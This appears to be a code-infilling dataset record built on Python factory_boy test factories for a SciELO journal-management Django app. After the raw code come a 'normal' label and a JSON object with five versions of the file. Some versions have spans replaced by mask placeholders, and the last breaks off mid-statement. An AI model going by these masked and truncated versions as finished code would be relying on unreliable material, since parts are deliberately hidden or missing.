class PressReleaseArticleFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseArticle
press_release = factory.SubFactory(RegularPressReleaseFactory)
article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
class ArticleFactory(factory.Factory):
FACTORY_FOR = models.Article
xml = SAMPLE_XML
is_aop = False
domain_key = factory.Sequence(
lambda n: 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)
journal_title = u'Revista de Saúde Pública'
issn_ppub = u'0034-8910'
issn_epub = u'1518-8787'
xml_version = u'sps-1.2'
article_type = u'research-article'
doi = u'10.1590/S0034-8910.2014048004965'
class ArticleAssetFactory(factory.Factory):
FACTORY_FOR = models.ArticleAsset
article = factory.SubFactory(ArticleFactory)
file = File(SAMPLE_TIFF_IMAGE)
owner = u'SciELO'
use_license = u'Creative Commons - BY'
|
normal
|
{
"blob_id": "44d87f112ab60a202e4c8d64d7aec6f4f0d10578",
"index": 31,
"step-1": "<mask token>\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n",
"step-2": "<mask token>\n\n\nclass GroupFactory(factory.Factory):\n <mask token>\n <mask token>\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = 'fapesp@scielo.org'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'fapesp@scielo.org'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'cbcd@cbcd.org.br'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n",
"step-3": "<mask token>\n\n\nclass UserFactory(factory.Factory):\n <mask token>\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list('id', flat=True\n ).order_by('-id')[0] + 1\n except IndexError:\n return 0\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = 'fapesp@scielo.org'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'fapesp@scielo.org'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. 
= (11) 3288-8174/3289-0741'\n )\n editor_email = u'cbcd@cbcd.org.br'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n",
"step-4": "<mask token>\n_HERE = os.path.dirname(os.path.abspath(__file__))\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')\n ) as xml_file:\n SAMPLE_XML = xml_file.read()\nSAMPLE_TIFF_IMAGE = open(os.path.join(_HERE, 'image_test',\n 'sample_tif_image.tif'))\nwith open(os.path.join(_HERE, 'xml_samples',\n '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:\n SAMPLE_XML_RELATED = xml_file.read()\n\n\nclass UserFactory(factory.Factory):\n FACTORY_FOR = models.User\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list('id', flat=True\n ).order_by('-id')[0] + 1\n except IndexError:\n return 0\n username = factory.Sequence(lambda n: 'jmanager_username%s' % n)\n first_name = factory.Sequence(lambda n: 'jmanager_first_name%s' % n)\n last_name = factory.Sequence(lambda n: 'jmanager_last_name%s' % n)\n email = factory.Sequence(lambda n: 'jmanager_email%s@example.com' % n)\n password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'\n is_staff = False\n is_active = True\n is_superuser = False\n last_login = datetime.datetime(2000, 1, 1)\n date_joined = datetime.datetime(1999, 1, 1)\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = 'fapesp@scielo.org'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'fapesp@scielo.org'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. 
(São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'cbcd@cbcd.org.br'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n 
article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n",
"step-5": "# coding: utf-8\nimport os\n\nimport factory\nimport datetime\n\nfrom journalmanager import models\nfrom django.contrib.auth.models import Group\nfrom django.core.files.base import File\n\n\n_HERE = os.path.dirname(os.path.abspath(__file__))\n\n\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')) as xml_file:\n SAMPLE_XML = xml_file.read()\n\n\nSAMPLE_TIFF_IMAGE = open(\n os.path.join(_HERE, 'image_test', 'sample_tif_image.tif'))\n\n\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:\n SAMPLE_XML_RELATED = xml_file.read()\n\n\nclass UserFactory(factory.Factory):\n FACTORY_FOR = models.User\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list(\n 'id', flat=True).order_by('-id')[0] + 1\n except IndexError:\n return 0\n\n username = factory.Sequence(lambda n: \"jmanager_username%s\" % n)\n first_name = factory.Sequence(lambda n: \"jmanager_first_name%s\" % n)\n last_name = factory.Sequence(lambda n: \"jmanager_last_name%s\" % n)\n email = factory.Sequence(lambda n: \"jmanager_email%s@example.com\" % n)\n password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'\n is_staff = False\n is_active = True\n is_superuser = False\n last_login = datetime.datetime(2000, 1, 1)\n date_joined = datetime.datetime(1999, 1, 1)\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n\n name = factory.Sequence(lambda n: \"Group #%s\" % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = u'Av. Professor Lineu Prestes, 338 Cidade Universitária \\\n Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n email = 'fapesp@scielo.org'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'fapesp@scielo.org'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. 
(São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\".strip()\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n editor_email = u'cbcd@cbcd.org.br'\n\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n\n title = u'Artigos Originais'\n\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = 